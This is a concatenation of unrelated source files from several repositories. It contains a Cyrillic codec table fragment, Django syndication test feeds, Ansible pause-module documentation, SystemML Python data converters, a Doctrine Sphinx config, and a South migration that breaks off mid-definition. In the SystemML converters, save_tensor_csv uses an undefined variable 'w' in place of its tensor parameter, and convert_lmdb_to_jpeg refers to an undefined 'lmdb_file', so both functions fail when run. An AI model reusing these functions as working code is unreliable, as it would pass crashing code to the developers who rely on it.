u'\u0451' # 0xF1 -> CYRILLIC SMALL LETTER IO
u'\u0452' # 0xF2 -> CYRILLIC SMALL LETTER DJE
u'\u0453' # 0xF3 -> CYRILLIC SMALL LETTER GJE
u'\u0454' # 0xF4 -> CYRILLIC SMALL LETTER UKRAINIAN IE
u'\u0455' # 0xF5 -> CYRILLIC SMALL LETTER DZE
u'\u0456' # 0xF6 -> CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
u'\u0457' # 0xF7 -> CYRILLIC SMALL LETTER YI
u'\u0458' # 0xF8 -> CYRILLIC SMALL LETTER JE
u'\u0459' # 0xF9 -> CYRILLIC SMALL LETTER LJE
u'\u045a' # 0xFA -> CYRILLIC SMALL LETTER NJE
u'\u045b' # 0xFB -> CYRILLIC SMALL LETTER TSHE
u'\u045c' # 0xFC -> CYRILLIC SMALL LETTER KJE
u'\xa7' # 0xFD -> SECTION SIGN
u'\u045e' # 0xFE -> CYRILLIC SMALL LETTER SHORT U
u'\u045f' # 0xFF -> CYRILLIC SMALL LETTER DZHE
)
### Encoding table
encoding_table=codecs.charmap_build(decoding_table)
|
t0in4/django
|
refs/heads/master
|
tests/syndication_tests/feeds.py
|
278
|
from __future__ import unicode_literals
from django.contrib.syndication import views
from django.utils import feedgenerator
from django.utils.timezone import get_fixed_timezone
from .models import Article, Entry
class TestRss2Feed(views.Feed):
title = 'My blog'
description = 'A more thorough description of my blog.'
link = '/blog/'
feed_guid = '/foo/bar/1234'
author_name = 'Sally Smith'
author_email = '[email protected]'
author_link = 'http://www.example.com/'
categories = ('python', 'django')
feed_copyright = 'Copyright (c) 2007, Sally Smith'
ttl = 600
def items(self):
return Entry.objects.all()
def item_description(self, item):
return "Overridden description: %s" % item
def item_pubdate(self, item):
return item.published
def item_updateddate(self, item):
return item.updated
item_author_name = 'Sally Smith'
item_author_email = '[email protected]'
item_author_link = 'http://www.example.com/'
item_categories = ('python', 'testing')
item_copyright = 'Copyright (c) 2007, Sally Smith'
class TestRss2FeedWithGuidIsPermaLinkTrue(TestRss2Feed):
def item_guid_is_permalink(self, item):
return True
class TestRss2FeedWithGuidIsPermaLinkFalse(TestRss2Feed):
def item_guid(self, item):
return str(item.pk)
def item_guid_is_permalink(self, item):
return False
class TestRss091Feed(TestRss2Feed):
feed_type = feedgenerator.RssUserland091Feed
class TestNoPubdateFeed(views.Feed):
title = 'Test feed'
link = '/feed/'
def items(self):
return Entry.objects.all()
class TestAtomFeed(TestRss2Feed):
feed_type = feedgenerator.Atom1Feed
subtitle = TestRss2Feed.description
class TestLatestFeed(TestRss2Feed):
"""
A feed where the latest entry date is an `updated` element.
"""
feed_type = feedgenerator.Atom1Feed
subtitle = TestRss2Feed.description
def items(self):
return Entry.objects.exclude(pk=5)
class ArticlesFeed(TestRss2Feed):
"""
A feed to test no link being defined. Articles have no get_absolute_url()
method, and item_link() is not defined.
"""
def items(self):
return Article.objects.all()
class TestEnclosureFeed(TestRss2Feed):
pass
class TemplateFeed(TestRss2Feed):
"""
A feed to test defining item titles and descriptions with templates.
"""
title_template = 'syndication/title.html'
description_template = 'syndication/description.html'
# Defining a template overrides any item_title definition
def item_title(self):
return "Not in a template"
class TemplateContextFeed(TestRss2Feed):
"""
A feed to test custom context data in templates for title or description.
"""
title_template = 'syndication/title_context.html'
description_template = 'syndication/description_context.html'
def get_context_data(self, **kwargs):
context = super(TemplateContextFeed, self).get_context_data(**kwargs)
context['foo'] = 'bar'
return context
class NaiveDatesFeed(TestAtomFeed):
"""
A feed with naive (non-timezone-aware) dates.
"""
def item_pubdate(self, item):
return item.published
class TZAwareDatesFeed(TestAtomFeed):
"""
A feed with timezone-aware dates.
"""
def item_pubdate(self, item):
# Provide a weird offset so that the test can know it's getting this
# specific offset and not accidentally getting on from
# settings.TIME_ZONE.
return item.published.replace(tzinfo=get_fixed_timezone(42))
class TestFeedUrlFeed(TestAtomFeed):
feed_url = 'http://example.com/customfeedurl/'
class MyCustomAtom1Feed(feedgenerator.Atom1Feed):
"""
Test of a custom feed generator class.
"""
def root_attributes(self):
attrs = super(MyCustomAtom1Feed, self).root_attributes()
attrs['django'] = 'rocks'
return attrs
def add_root_elements(self, handler):
super(MyCustomAtom1Feed, self).add_root_elements(handler)
handler.addQuickElement('spam', 'eggs')
def item_attributes(self, item):
attrs = super(MyCustomAtom1Feed, self).item_attributes(item)
attrs['bacon'] = 'yum'
return attrs
def add_item_elements(self, handler, item):
super(MyCustomAtom1Feed, self).add_item_elements(handler, item)
handler.addQuickElement('ministry', 'silly walks')
class TestCustomFeed(TestAtomFeed):
feed_type = MyCustomAtom1Feed
|
willthames/ansible
|
refs/heads/devel
|
lib/ansible/modules/utilities/logic/pause.py
|
13
|
# -*- mode: python -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = '''
---
module: pause
short_description: Pause playbook execution
description:
- Pauses playbook execution for a set amount of time, or until a prompt is acknowledged. All parameters are optional. The default behavior is to
pause with a prompt.
- >
You can use C(ctrl+c) if you wish to advance a pause earlier than it is set to expire or if you need to abort a playbook run entirely. To continue early:
press C(ctrl+c) and then C(c). To abort a playbook: press C(ctrl+c) and then C(a).
- >
The pause module integrates into async/parallelized playbooks without any special considerations (see also: Rolling Updates). When using pauses with
the C(serial) playbook parameter (as in rolling updates) you are only prompted once for the current group of hosts.
- This module is also supported for Windows targets.
version_added: "0.8"
options:
minutes:
description:
- A positive number of minutes to pause for.
required: false
default: null
seconds:
description:
- A positive number of seconds to pause for.
required: false
default: null
prompt:
description:
- Optional text to use for the prompt message.
required: false
default: null
author: "Tim Bielawa (@tbielawa)"
notes:
- Starting in 2.2, if you specify 0 or negative for minutes or seconds, it will wait for 1 second, previously it would wait indefinitely.
- This module is also supported for Windows targets.
'''
EXAMPLES = '''
# Pause for 5 minutes to build app cache.
- pause:
minutes: 5
# Pause until you can verify updates to an application were successful.
- pause:
# A helpful reminder of what to look out for post-update.
- pause:
prompt: "Make sure org.foo.FooOverload exception is not present"
'''
RETURN = '''
user_input:
description: User input from interactive console
returned: if no waiting time set
type: string
sample: Example user input
start:
description: Time when started pausing
returned: always
type: string
sample: "2017-02-23 14:35:07.298862"
stop:
description: Time when ended pausing
returned: always
type: string
sample: "2017-02-23 14:35:09.552594"
delta:
description: Time paused in seconds
returned: always
type: string
sample: 2
stdout:
description: Output of pause module
returned: always
type: string
sample: Paused for 0.04 minutes
'''
|
niketanpansare/incubator-systemml
|
refs/heads/master
|
src/main/python/systemml/converters.py
|
5
|
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
__all__ = [
'getNumCols',
'convertToMatrixBlock',
'convert_caffemodel',
'convert_lmdb_to_jpeg',
'convertToNumPyArr',
'convertToPandasDF',
'SUPPORTED_TYPES',
'convertToLabeledDF',
'convertImageToNumPyArr',
'getDatasetMean']
import numpy as np
import pandas as pd
import os
import math
from pyspark.context import SparkContext
from scipy.sparse import coo_matrix, spmatrix, csr_matrix
from .classloader import *
SUPPORTED_TYPES = (np.ndarray, pd.DataFrame, spmatrix)
DATASET_MEAN = {'VGG_ILSVRC_19_2014': [103.939, 116.779, 123.68]}
def getNumCols(numPyArr):
if numPyArr.ndim == 1:
return 1
else:
return numPyArr.shape[1]
def get_pretty_str(key, value):
return '\t"' + key + '": ' + str(value) + ',\n'
def save_tensor_csv(tensor, file_path, shouldTranspose):
w = w.reshape(w.shape[0], -1)
if shouldTranspose:
w = w.T
np.savetxt(file_path, w, delimiter=',')
with open(file_path + '.mtd', 'w') as file:
file.write('{\n\t"data_type": "matrix",\n\t"value_type": "double",\n')
file.write(get_pretty_str('rows', w.shape[0]))
file.write(get_pretty_str('cols', w.shape[1]))
file.write(get_pretty_str('nnz', np.count_nonzero(w)))
file.write(
'\t"format": "csv",\n\t"description": {\n\t\t"author": "SystemML"\n\t}\n}\n')
def convert_caffemodel(sc, deploy_file, caffemodel_file,
output_dir, format="binary", is_caffe_installed=False):
"""
Saves the weights and bias in the caffemodel file to output_dir in the specified format.
This method does not requires caffe to be installed.
Parameters
----------
sc: SparkContext
SparkContext
deploy_file: string
Path to the input network file
caffemodel_file: string
Path to the input caffemodel file
output_dir: string
Path to the output directory
format: string
Format of the weights and bias (can be binary, csv or text)
is_caffe_installed: bool
True if caffe is installed
"""
if is_caffe_installed:
if format != 'csv':
raise ValueError(
'The format ' +
str(format) +
' is not supported when caffe is installed. Hint: Please specify format=csv')
import caffe
net = caffe.Net(deploy_file, caffemodel_file, caffe.TEST)
for layerName in net.params.keys():
num_parameters = len(net.params[layerName])
if num_parameters == 0:
continue
elif num_parameters == 2:
# Weights and Biases
layerType = net.layers[list(
net._layer_names).index(layerName)].type
shouldTranspose = True if layerType == 'InnerProduct' else False
save_tensor_csv(
net.params[layerName][0].data,
os.path.join(
output_dir,
layerName +
'_weight.mtx'),
shouldTranspose)
save_tensor_csv(
net.params[layerName][1].data,
os.path.join(
output_dir,
layerName +
'_bias.mtx'),
shouldTranspose)
elif num_parameters == 1:
# Only Weight
layerType = net.layers[list(
net._layer_names).index(layerName)].type
shouldTranspose = True if layerType == 'InnerProduct' else False
save_tensor_csv(
net.params[layerName][0].data,
os.path.join(
output_dir,
layerName +
'_weight.mtx'),
shouldTranspose)
else:
raise ValueError(
'Unsupported number of parameters:' +
str(num_parameters))
else:
createJavaObject(sc, 'dummy')
utilObj = sc._jvm.org.apache.sysml.api.dl.Utils()
utilObj.saveCaffeModelFile(
sc._jsc,
deploy_file,
caffemodel_file,
output_dir,
format)
def convert_lmdb_to_jpeg(lmdb_img_file, output_dir):
"""
Saves the images in the lmdb file as jpeg in the output_dir. This method requires caffe to be installed along with lmdb and cv2 package.
To install cv2 package, do `pip install opencv-python`.
Parameters
----------
lmdb_img_file: string
Path to the input lmdb file
output_dir: string
Output directory for images (local filesystem)
"""
import lmdb
import caffe
import cv2
lmdb_cursor = lmdb.open(lmdb_file, readonly=True).begin().cursor()
datum = caffe.proto.caffe_pb2.Datum()
i = 1
for _, value in lmdb_cursor:
datum.ParseFromString(value)
data = caffe.io.datum_to_array(datum)
output_file_path = os.path.join(output_dir, 'file_' + str(i) + '.jpg')
image = np.transpose(data, (1, 2, 0)) # CxHxW to HxWxC in cv2
cv2.imwrite(output_file_path, image)
i = i + 1
def convertToLabeledDF(sparkSession, X, y=None):
from pyspark.ml.feature import VectorAssembler
if y is not None:
pd1 = pd.DataFrame(X)
pd2 = pd.DataFrame(y, columns=['label'])
pdf = pd.concat([pd1, pd2], axis=1)
inputColumns = ['C' + str(i) for i in pd1.columns]
outputColumns = inputColumns + ['label']
else:
pdf = pd.DataFrame(X)
inputColumns = ['C' + str(i) for i in pdf.columns]
outputColumns = inputColumns
assembler = VectorAssembler(inputCols=inputColumns, outputCol='features')
out = assembler.transform(sparkSession.createDataFrame(pdf, outputColumns))
if y is not None:
return out.select('features', 'label')
else:
return out.select('features')
def _convertSPMatrixToMB(sc, src):
src = coo_matrix(src, dtype=np.float64)
numRows = src.shape[0]
numCols = src.shape[1]
data = src.data
row = src.row.astype(np.int32)
col = src.col.astype(np.int32)
nnz = len(src.col)
buf1 = bytearray(data.tostring())
buf2 = bytearray(row.tostring())
buf3 = bytearray(col.tostring())
createJavaObject(sc, 'dummy')
return sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.convertSciPyCOOToMB(
buf1, buf2, buf3, numRows, numCols, nnz)
def _convertDenseMatrixToMB(sc, src):
numCols = getNumCols(src)
numRows = src.shape[0]
src = np.asarray(src, dtype=np.float64) if not isinstance(src, np.ndarray) else src
# data_type: 0: int, 1: float and 2: double
if src.dtype is np.dtype(np.int32):
arr = src.ravel().astype(np.int32)
dataType = 0
elif src.dtype is np.dtype(np.float32):
arr = src.ravel().astype(np.float32)
dataType = 1
else:
arr = src.ravel().astype(np.float64)
dataType = 2
buf = bytearray(arr.tostring())
createJavaObject(sc, 'dummy')
return sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.convertPy4JArrayToMB(
buf, numRows, numCols, dataType)
def _copyRowBlock(i, sc, ret, src, numRowsPerBlock, rlen, clen):
rowIndex = int(i / numRowsPerBlock)
tmp = src[i:min(i + numRowsPerBlock, rlen), ]
mb = _convertSPMatrixToMB(
sc,
tmp) if isinstance(
src,
spmatrix) else _convertDenseMatrixToMB(
sc,
tmp)
sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.copyRowBlocks(
mb, rowIndex, ret, numRowsPerBlock, rlen, clen)
return i
def convertToMatrixBlock(sc, src, maxSizeBlockInMB=128):
if not isinstance(sc, SparkContext):
raise TypeError('sc needs to be of type SparkContext')
if isinstance(src, spmatrix):
isSparse = True
else:
isSparse = False
src = np.asarray(src, dtype=np.float64) if not isinstance(src, np.ndarray) else src
if len(src.shape) != 2:
src_type = str(type(src).__name__)
raise TypeError('Expected 2-dimensional ' +
src_type +
', instead passed ' +
str(len(src.shape)) +
'-dimensional ' +
src_type)
worstCaseSizeInMB = (8*(src.getnnz()*3 if isSparse else src.shape[0]*src.shape[1])) / 1000000
# Ignoring sparsity for computing numRowsPerBlock for now
numRowsPerBlock = int(
math.ceil((maxSizeBlockInMB * 1000000) / (src.shape[1] * 8)))
if worstCaseSizeInMB <= maxSizeBlockInMB:
return _convertSPMatrixToMB(
sc, src) if isSparse else _convertDenseMatrixToMB(sc, src)
else:
# Since coo_matrix does not have range indexing
src = csr_matrix(src) if isSparse else src
rlen = int(src.shape[0])
clen = int(src.shape[1])
ret = sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.allocateDenseOrSparse(
rlen, clen, isSparse)
[_copyRowBlock(i, sc, ret, src, numRowsPerBlock, rlen, clen)
for i in range(0, src.shape[0], numRowsPerBlock)]
sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.postProcessAfterCopying(
ret)
return ret
def convertToNumPyArr(sc, mb):
if isinstance(sc, SparkContext):
numRows = mb.getNumRows()
numCols = mb.getNumColumns()
createJavaObject(sc, 'dummy')
buf = sc._jvm.org.apache.sysml.runtime.instructions.spark.utils.RDDConverterUtilsExt.convertMBtoPy4JDenseArr(
mb)
return np.frombuffer(buf, count=numRows * numCols,
dtype=np.float64).reshape((numRows, numCols))
else:
# TODO: We can generalize this by creating py4j gateway ourselves
raise TypeError('sc needs to be of type SparkContext')
# Returns the mean of a model if defined otherwise None
def getDatasetMean(dataset_name):
"""
Parameters
----------
dataset_name: Name of the dataset used to train model. This name is artificial name based on dataset used to train the model.
Returns
-------
mean: Mean value of model if its defined in the list DATASET_MEAN else None.
"""
try:
mean = DATASET_MEAN[dataset_name.upper()]
except BaseException:
mean = None
return mean
# Example usage: convertImageToNumPyArr(im, img_shape=(3, 224, 224), add_rotated_images=True, add_mirrored_images=True)
# The above call returns a numpy array of shape (6, 50176) in NCHW format
def convertImageToNumPyArr(im, img_shape=None, add_rotated_images=False, add_mirrored_images=False,
color_mode='RGB', mean=None):
# Input Parameters
# color_mode: In case of VGG models which expect image data in BGR format instead of RGB for other most models,
# color_mode parameter is used to process image data in BGR format.
# mean: mean value is used to subtract from input data from every pixel
# value. By default value is None, so mean value not subtracted.
if img_shape is not None:
num_channels = img_shape[0]
size = (img_shape[1], img_shape[2])
else:
num_channels = 1 if im.mode == 'L' else 3
size = None
if num_channels != 1 and num_channels != 3:
raise ValueError('Expected the number of channels to be either 1 or 3')
from PIL import Image
if size is not None:
im = im.resize(size, Image.LANCZOS)
expected_mode = 'L' if num_channels == 1 else 'RGB'
if expected_mode is not im.mode:
im = im.convert(expected_mode)
def _im2NumPy(im):
if expected_mode == 'L':
return np.asarray(im.getdata()).reshape((1, -1))
else:
im = (np.array(im).astype(np.float))
# (H,W,C) -> (C,H,W)
im = im.transpose(2, 0, 1)
# RGB -> BGR
if color_mode == 'BGR':
im = im[..., ::-1]
# Subtract Mean
if mean is not None:
for c in range(3):
im[:, :, c] = im[:, :, c] - mean[c]
# (C,H,W) --> (1, C*H*W)
return im.reshape((1, -1))
ret = _im2NumPy(im)
if add_rotated_images:
ret = np.vstack(
(ret, _im2NumPy(
im.rotate(90)), _im2NumPy(
im.rotate(180)), _im2NumPy(
im.rotate(270))))
if add_mirrored_images:
ret = np.vstack(
(ret, _im2NumPy(
im.transpose(
Image.FLIP_LEFT_RIGHT)), _im2NumPy(
im.transpose(
Image.FLIP_TOP_BOTTOM))))
return ret
def convertToPandasDF(X):
if not isinstance(X, pd.DataFrame):
return pd.DataFrame(X, columns=['C' + str(i)
for i in range(getNumCols(X))])
return X
|
itkg-dmoate/projetsynfony
|
refs/heads/master
|
vendor/doctrine/orm/docs/en/conf.py
|
2448
|
# -*- coding: utf-8 -*-
#
# Doctrine 2 ORM documentation build configuration file, created by
# sphinx-quickstart on Fri Dec 3 18:10:24 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.append(os.path.abspath('_exts'))
# -- General configuration -----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['configurationblock']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Doctrine 2 ORM'
copyright = u'2010-12, Doctrine Project Team'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '2'
# The full version, including alpha/beta/rc tags.
release = '2'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
language = 'en'
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directory, that shouldn't be searched
# for source files.
exclude_trees = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
show_authors = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'doctrine'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['_theme']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Doctrine2ORMdoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Doctrine2ORM.tex', u'Doctrine 2 ORM Documentation',
u'Doctrine Project Team', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
primary_domain = "dcorm"
def linkcode_resolve(domain, info):
if domain == 'dcorm':
return 'http://'
return None
|
hzlf/openbroadcast
|
refs/heads/master
|
website/shop/shop_simplevariations/migrations/0003_auto__add_textoption__del_field_cartitemtextoption_price__add_field_ca.py
|
3
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'TextOption'
db.create_table('shop_simplevariations_textoption', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('description', self.gf('django.db.models.fields.CharField')(max_length=255)),
('price', self.gf('django.db.models.fields.DecimalField')(default='0.00', max_digits=12, decimal_places=2)),
))
db.send_create_signal('shop_simplevariations', ['TextOption'])
# Deleting field 'CartItemTextOption.price'
db.delete_column('shop_simplevariations_cartitemtextoption', 'price')
# Adding field 'CartItemTextOption.text_option'
db.add_column('shop_simplevariations_cartitemtextoption', 'text_option', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['shop_simplevariations.TextOption']), keep_default=False)
def backwards(self, orm):
# Deleting model 'TextOption'
db.delete_table('shop_simplevariations_textoption')
# Adding field 'CartItemTextOption.price'
db.add_column('shop_simplevariations_cartitemtextoption', 'price', self.gf('django.db.models.fields.DecimalField')(default='0.00', max_digits=12, decimal_places=2), keep_default=False)
# Deleting field 'CartItemTextOption.text_option'
db.delete_column('shop_simplevariations_cartitemtextoption', 'text_option_id')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shop.cart': {
'Meta': {'object_name': 'Cart'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'null': 'True', 'blank': 'True'})
},
'shop.cartitem': {
'Meta': {'object_name': 'CartItem'},
'cart': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Cart']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Product']"}),
'quantity': ('django.db.models.fields.IntegerField', [], {})
},
'shop.product': {
'Meta': {'object_name': 'Product'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'polymorphic_shop.product_set'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'unit_price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop_simplevariations.cartitemoption': {
'Meta': {'object_name': 'CartItemOption'},
'cartitem': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.CartItem']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop_simplevariations.Option']"})
},
'shop_simplevariations.cartitemtextoption': {
'Meta': {'object_name': 'CartItemTextOption'},
'cartitem': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.CartItem']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'text': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'text_option': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop_simplevariations.TextOption']"})
},
'shop_simplevariations.option': {
'Meta': {'object_name': 'Option'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop_simplevariations.OptionGroup']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': "'0.00'", 'max_digits': '12', 'decimal_places': '2'})
},
'shop_simplevariations.optiongroup': {
'Meta': {'object_name': 'OptionGroup'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'products': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'option_groups'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['shop.Product']"}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'})
},
'shop_simplevariations.textoption': {
'Meta': {'object_name': 'TextOption'},
'description': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
